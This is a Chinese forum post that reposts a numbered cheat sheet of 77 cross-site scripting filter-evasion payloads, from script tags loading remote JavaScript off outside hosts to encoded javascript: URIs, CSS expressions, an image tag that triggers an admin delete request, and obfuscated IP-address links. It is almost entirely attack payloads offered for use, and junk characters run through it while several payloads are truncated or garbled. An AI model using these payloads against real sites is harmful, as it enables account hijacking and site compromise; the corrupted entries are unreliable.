貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。. E5 y- n" s# B* \
& ^) D- ~; Q6 R& Z
(1)普通的XSS JavaScript注入
k/ K1 V/ f. |3 I- B8 ] <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. U5 J8 g! Y/ _% f' X0 n( C7 ^ J3 g- m
(2)IMG标签XSS使用JavaScript命令
( }7 G# H. h7 a. P <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 z. a; t2 {6 m. d, o
$ \1 G5 R) _* n (3)IMG标签无分号无引号
& L/ R8 K+ I* T0 ~" _ <IMG SRC=javascript:alert(‘XSS’)>
( ?: e3 h. N1 X$ F1 r' q. [9 S m k9 ~! H
(4)IMG标签大小写不敏感
! u; ^6 v0 V3 {9 @* B& }9 f <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
% \& V+ ~2 a4 W9 o+ E. L& W) e m$ |
C! B9 [' N$ M (5)HTML编码(必须有分号): B [$ C- Z, O8 D! X. F
<IMG SRC=javascript:alert(“XSS”)> }8 k4 q3 n4 o& U4 l
) |1 l" e m6 u$ |+ C
(6)修正缺陷IMG标签
# y# S2 W& _- t5 J$ Y/ j- v* n <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ ]2 A/ ?- r+ l9 m. z
: d0 K) l0 K7 a4 X$ V; c (7)formCharCode标签(计算器)# f/ Y% ~: i. ` ^- I% B3 c
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 ?+ K, n6 _8 ]: B% w4 _0 M6 I s$ D! \
(8)UTF-8的Unicode编码(计算器)
) q) r+ f0 ^8 E, u) h4 A <IMG SRC=jav..省略..S')>% J) h# S+ ]8 N; x
, }" ?9 Q* X% X7 b+ s. s+ M
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
0 h# f3 H/ H9 O7 o& }# D, v <IMG SRC=jav..省略..S')>
* i- i* n1 g3 _1 N9 X; \/ M; F5 Q
(10)十六进制编码也是没有分号(计算器)
! A: P2 @' \$ [ G <IMG SRC=java..省略..XSS')>& O/ d' u5 P) d
5 ?; t. Z- k) v
(11)嵌入式标签,将Javascript分开
- M1 o: S$ z" \ <IMG SRC=”jav ascript:alert(‘XSS’);”>
9 B7 E- C: Q/ F
5 L/ a6 g0 V0 @ (12)嵌入式编码标签,将Javascript分开/ H# P) ?9 |( x' {! A k+ ^6 y* H ~
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! N: m" {# e0 E: x+ Q
4 r/ p+ a- _* K7 m2 K% G (13)嵌入式换行符
8 B6 b! ^; P1 |3 | <IMG SRC=”jav ascript:alert(‘XSS’);”>' \8 o. H. L! L3 y/ G2 p
' n# I6 e* o" K0 J/ C0 ~+ u* p
(14)嵌入式回车. K" ?' e% d& J6 {; c1 L
<IMG SRC=”jav ascript:alert(‘XSS’);”>
) C8 @+ r: Q, I& {2 Z& Q+ R9 W w
+ Q% n8 d& Y, r (15)嵌入式多行注入JavaScript,这是XSS极端的例子
; D8 ^, `( ~' Q2 s9 {* ^$ X3 g <IMG SRC=”javascript:alert(‘XSS‘)”>
) |$ C' ^6 k+ b* n4 c! n) n8 c5 m6 x; r
(16)解决限制字符(要求同页面)
5 e2 Q) a9 c7 \0 L: A; y/ Y/ O% M <script>z=’document.’</script>
. \/ ^4 T; ~- b% y+ a# R <script>z=z+’write(“‘</script>
( D$ h% o+ \& M4 s8 h <script>z=z+’<script’</script>
* E+ H& J) x1 b+ h; b! {) N& b* ^ <script>z=z+’ src=ht’</script>3 y& b$ d, n7 r c, I' l
<script>z=z+’tp://ww’</script> m5 u, I( I) L3 U+ F$ ^0 j- T
<script>z=z+’w.shell’</script>2 G+ J+ p4 C- Z/ W
<script>z=z+’.net/1.’</script>: H2 H! L$ n# n. J! G# h" ]* S
<script>z=z+’js></sc’</script>
& c$ Z, p, B# s <script>z=z+’ript>”)’</script>1 @2 Z9 T+ l) S( l, ~
<script>eval_r(z)</script>/ E* t6 A) M, d! [1 q, y
7 m6 L7 W4 ?1 S (17)空字符( Q4 N$ o; |9 o. Q5 C$ _4 Q' O
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out/ H7 l5 q7 ^0 \6 E
" X7 `$ y" C3 n; o: B! }
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用& B+ p4 w$ d1 C+ ^/ {. T- E/ w9 F. d
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ O! H/ P+ c) R5 r; {
& n' _' ?4 D" L (19)Spaces和meta前的IMG标签
+ O7 M2 d( r- _% `4 \ <IMG SRC=” � javascript:alert(‘XSS’);”>
9 }! g2 k$ ?4 \- H% m4 w
8 Q0 o% E, f* H" @- d0 T1 u9 R (20)Non-alpha-non-digit XSS
& ^3 H( Y3 w) E0 D <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
j9 s* u+ R5 K* |% |6 ?% J. ^
% G" \* {! y8 T! Y! J( m) T (21)Non-alpha-non-digit XSS to 2% Y4 j' L; R/ }! S8 U' }+ l6 T
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& {: Z$ l& n: W6 K/ c5 y- R
- s( `. D/ a5 _% P (22)Non-alpha-non-digit XSS to 31 z) n7 b5 P' p) n. K( V& h
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; ]" E& N6 ~- P& L; [) a2 M# p+ D" @/ }1 U; f; H2 y2 S6 A7 R# j% l
(23)双开括号
. U& _2 K; E3 `9 v7 F, ? <<SCRIPT>alert(“XSS”);//<</SCRIPT>- R( s6 {1 _6 T6 G) w
- J% J$ n2 a9 f* |7 U (24)无结束脚本标记(仅火狐等浏览器)
. {4 l7 y8 ^2 M <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>5 F$ Q0 i3 o8 V$ q: o3 M$ s
3 } O3 @1 {( [/ T
(25)无结束脚本标记25 v. R, L! C1 r U! j( }: u
<SCRIPT SRC=//3w.org/XSS/xss.js>, J/ D5 f2 F% n: H3 `% }
8 z6 F, h0 I% b6 N& Z9 X# a
(26)半开的HTML/JavaScript XSS
' y- k- i4 ]& r$ L2 N <IMG SRC=”javascript:alert(‘XSS’)”
9 }+ S$ r6 e" N
$ ?* T' e2 i% R+ c) [6 m8 _% i (27)双开角括号
% {+ m2 [" v# F5 c1 \ <iframe src=http://3w.org/XSS.html <
4 s- v) V& W4 I" q5 C' s3 B7 v* h Q5 H) V* {6 d/ `2 @
(28)无单引号 双引号 分号/ y/ _( L* S: S I1 H$ U2 R
<SCRIPT>a=/XSS/
B* b: v7 Q& S1 C F8 k alert(a.source)</SCRIPT>
( r% C* M! z- H- ^" o/ M7 u/ z
& y7 p' z n0 Z* y, O/ N6 g (29)换码过滤的JavaScript
/ F' L. `% q2 ? y# t2 i+ l4 l a" N) C \”;alert(‘XSS’);//
3 U" g7 l) Y7 l. |' }+ O& B: q
) ?2 E! _+ B- }- u8 Q (30)结束Title标签
: r( [( p, s- l0 H4 z! ^4 y </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
$ Y; o3 Y( \1 a! j6 Z
- p0 j* \, ?' c" e8 }/ N* c! A (31)Input Image4 }4 D4 k$ B2 J
<INPUT SRC=”javascript:alert(‘XSS’);”>4 q' l3 u# l1 S# H& j' y
# ^1 Y. l9 M7 S) F (32)BODY Image% ?2 s+ @( @' M3 J5 q1 y* T* t
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>" V+ b' V8 V+ @* u" E
r8 N, G; a0 r+ d; ^7 o' ~$ }7 q8 W
(33)BODY标签( `7 I7 {: D+ P- D7 q
<BODY(‘XSS’)>6 D$ G' m/ ~7 W( N' R% L
, W+ }7 F3 f0 G( W" q: e
(34)IMG Dynsrc9 o* \& m# @# Q7 \+ A {, G! x
<IMG DYNSRC=”javascript:alert(‘XSS’)”>( e& O/ C+ n& N4 C# e
) I6 | W6 X' ]' s; i3 F0 l
(35)IMG Lowsrc
8 E- `, ]" _& S" W <IMG LOWSRC=”javascript:alert(‘XSS’)”>7 f4 ~$ F/ \% K1 _2 G% I. l) ?
5 ~- S/ t$ k. z! E7 K" k. v. f, S
(36)BGSOUND9 G% h8 V) J2 |6 X \
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
3 Q6 {* l, b- w2 U8 C; z
8 s3 _- [0 T$ h( ]; w (37)STYLE sheet
/ l( s* O$ G8 [ <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 k0 n9 J7 V8 @6 i# J
; c# @* Z' p1 E8 K" ~& u
(38)远程样式表
6 I1 P" q) w4 ^8 ]0 o- ^ <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) Q: m! V! }4 F, K; H# F8 T) z4 o
5 y T' G. V# ~0 P. T (39)List-style-image(列表式)
- Q# e! ]- E0 A* A. o! u/ K <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS& F$ Y1 O3 z1 x2 f+ }) e2 ^, P0 P5 _
1 v& a" y7 L- a! d8 q8 V, b5 } (40)IMG VBscript% m: U9 g+ @0 u: H$ `7 C+ r
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS& l) [. ~8 C, ^' y% r- a0 B
. W. G1 ]4 S- y8 b
(41)META链接url
v, i5 Z) X: C! O <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>: y' I& e- m; K6 R* S% J3 w
0 L, N7 h- A6 v3 j2 ], }6 K7 l+ ~" d (42)Iframe
1 {. C8 K: @2 o. T# Y! w/ O <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>* ]( |8 b1 \" h1 @9 O6 J
H+ j6 r: C7 Y6 q2 b$ ?1 C
(43)Frame& x3 r+ U9 V0 J; r2 c
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
" m+ m _( b3 i
- v2 C4 e/ F- e% a; V" B" B (44)Table0 X2 L/ R% z; ?( H# p
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 ^1 Y' A4 T* s( ?% C+ ~
+ N- f2 ^8 q$ p1 F! h* ?! M
(45)TD3 H0 I O/ W3 i& r' v7 s
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ }2 n; s; ?. ` e' t; \8 [% U
& U# Y) M# k# Q- \
(46)DIV background-image
2 [0 `' `* r2 i+ t <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ |& ?2 q! d; A) Y
8 A8 i6 B \3 ]2 J; B' D (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: [- @; r/ U8 K# z- F6 s9 S <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>9 \6 w6 Q& Q" C( I' |: V! y
5 E; }' r4 n, j: e- L5 U (48)DIV expression
: w5 H6 E, W& ?9 ^2 L <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ J0 V' D" K* l, Z8 ^" Q+ R+ o5 X$ \( y+ Z' g2 h0 L7 p
(49)STYLE属性分拆表达
, ~- Q- x8 I, E2 a. z <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ x5 X% ^% N' c: d- B# \' p: P0 i2 s4 y8 l$ @$ I" l
(50)匿名STYLE(组成:开角号和一个字母开头), U' ^3 M% W! N
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
( { Q7 q+ F2 j. F3 U: e2 F1 Q$ E, l9 `& T1 f: O7 n% l8 k0 A2 F
(51)STYLE background-image5 \ I h) t+ ]3 I W
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
, c) C- F0 Q. e
6 B+ t0 P8 }) M+ E* O (52)IMG STYLE方式+ p" o/ K: D, w
exppression(alert(“XSS”))’>
5 Q5 W4 ]; i( V* N* Z0 I8 c) d# z& d1 Z+ `+ _- I# l# _- d# e- l; q
(53)STYLE background
0 U7 c9 v# J& O: @ <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ J7 k1 E P4 k% Q9 f- Y. p' X
' ? w( P. r" t2 [* b( ^6 g# W! z (54)BASE$ a+ h3 \. w8 ^; a
<BASE HREF=”javascript:alert(‘XSS’);//”>* F: `7 t; x1 P" L8 i2 z
- n+ K" k6 G" G6 o& a5 }& w& z
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 b+ [4 y3 e+ ^6 _, w
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ s4 k/ N, L) ]( K W
* z; P) E% g7 x3 \( w# B. @ (56)在flash中使用ActionScrpt可以混进你XSS的代码
% }- F! E2 r" {2 N+ t, s a=”get”;
@" ~4 h% I' r4 E" T3 W b=”URL(\”";: u6 @8 T& N5 Y! ^$ @3 C- h6 |
c=”javascript:”;
3 g6 c1 f8 I4 T8 a/ t d=”alert(‘XSS’);\”)”;
, S; \# K) D' `+ O eval_r(a+b+c+d);& P5 `4 o2 v) u2 M
: k- G$ D, D& @0 {! f/ \" V2 z+ O
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 O6 s7 U Z+ c1 H2 h# H- d# N
<HTML xmlns:xss>1 L' t6 o- D8 L, R1 W2 ]
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
0 n( _- U" m5 S6 F1 m3 X <xss:xss>XSS</xss:xss>
2 E9 I! ^9 L- b$ `, b) N+ d. M( B </HTML>
% Q% c3 F( a) G; G) K( h3 d
: P' q7 y5 d# A6 m/ t8 ]- v! C a (58)如果过滤了你的JS你可以在图片里添加JS代码来利用0 O5 `3 i& P- h
<SCRIPT SRC=””></SCRIPT>
5 K# J' a: q$ G& G
4 T1 H& b9 c$ K* Y0 x" o! c+ ^7 A (59)IMG嵌入式命令,可执行任意命令
+ x. e7 ?6 m" h! O6 g L <IMG SRC=”http://www.XXX.com/a.php?a=b”>/ }7 h' [7 q+ S) _, g
0 {5 q+ J: \/ t9 t6 p# ^ (60)IMG嵌入式命令(a.jpg在同服务器)
9 n6 i& y n7 v9 M( L: z Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
7 Y2 q% Q& e8 k3 y) I" U8 V9 j* ?; u" b$ W5 }
(61)绕符号过滤
( ~0 d% \. [& d) _% T <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; Q! W2 ^$ V- [+ g6 A
* E& R' u, o4 g2 f; n; j# t9 {7 ~0 P (62)0 l& \$ o/ F7 n3 |
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ R M5 ~* d3 ?- N
% C! B9 ]$ p; F/ A( P+ w* \/ P# A (63)3 Q/ s! T8 t( G4 v: ?7 ?
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& t. z7 O0 w6 P
" a: {- }0 v8 s/ D1 Z. P0 ~ (64)
1 c2 V2 m, i0 Y# e/ } <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>: O7 W) b0 G+ I5 b9 ~) o1 } |
9 @, |* F2 ?9 Q$ o* x+ Q (65)
8 t/ [* K. [5 \' O9 }& g6 P0 w <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>. _; r. ~6 Q: E
; S. ]2 w2 ~3 n& V6 @* c4 {6 `; y# E9 ?
(66): u7 P( J2 A3 n% z# c
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 a- `" C- W$ Y" e" @# d- n3 r. D+ h) T* h1 C% P
(67)
8 q& g. w7 B! S <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
g; y$ j6 i8 |- I6 Z+ a1 x/ ^
* _; p2 @- ^! t# M (68)URL绕行
8 H4 [* B/ C! a. _( I2 ^9 f <A HREF=”http://127.0.0.1/”>XSS</A>
, n8 ~7 r8 Q+ v: v( [! a: w, D b! B8 f
(69)URL编码
1 G% j1 Z \# k6 k <A HREF=”http://3w.org”>XSS</A>+ }2 l2 T& _' V# l
' J2 _4 E7 l2 f8 G. ~
(70)IP十进制- d5 J' d. g% I! P6 ~
<A HREF=”http://3232235521″>XSS</A>
' F+ ~' t6 `% `1 x, f$ @
6 A F0 _0 w, I" p (71)IP十六进制% Y: X" W4 f& G5 ^& O i1 s) S
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>! R | O. d* j- N" s% O; O- _% g% s
" f4 d, ]' o7 s* v1 F" ~9 |$ f9 B$ \; T (72)IP八进制
6 B( H$ D/ O+ U- T* i! {* a <A HREF=”http://0300.0250.0000.0001″>XSS</A>
5 U l; I$ I1 U3 R3 s$ u S
5 A) x4 M1 a' V$ w6 M9 ` (73)混合编码
/ L% c% M" E: |! N* m8 q) q <A HREF=”h5 T8 w1 k' Z9 W7 \# I9 k# h' f) Y
tt p://6 6.000146.0×7.147/”">XSS</A>
2 q( }) T/ I3 o6 N: I( D/ X M( B
8 X7 u& Y, W/ Z( L (74)节省[http:]
( D) Z- d7 A8 T6 T% p { <A HREF=”//www.google.com/”>XSS</A>: R$ i5 h- g/ X( c+ [
! o9 O! p4 K3 O& n
(75)节省[www]3 Q6 Q" p: J4 r3 ?+ A7 V) g2 N
<A HREF=”http://google.com/”>XSS</A>
; M% U! w- y, h8 a) n( I, N+ R( j/ T+ O) f, j" e
(76)绝对点绝对DNS
7 g3 [) X7 p: w) u <A HREF=”http://www.google.com./”>XSS</A>
7 ?9 \' Q" Z+ _" k& V/ l( S
0 D2 o( \' m! `% U! t R (77)javascript链接
, k V" s* j/ F2 P <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对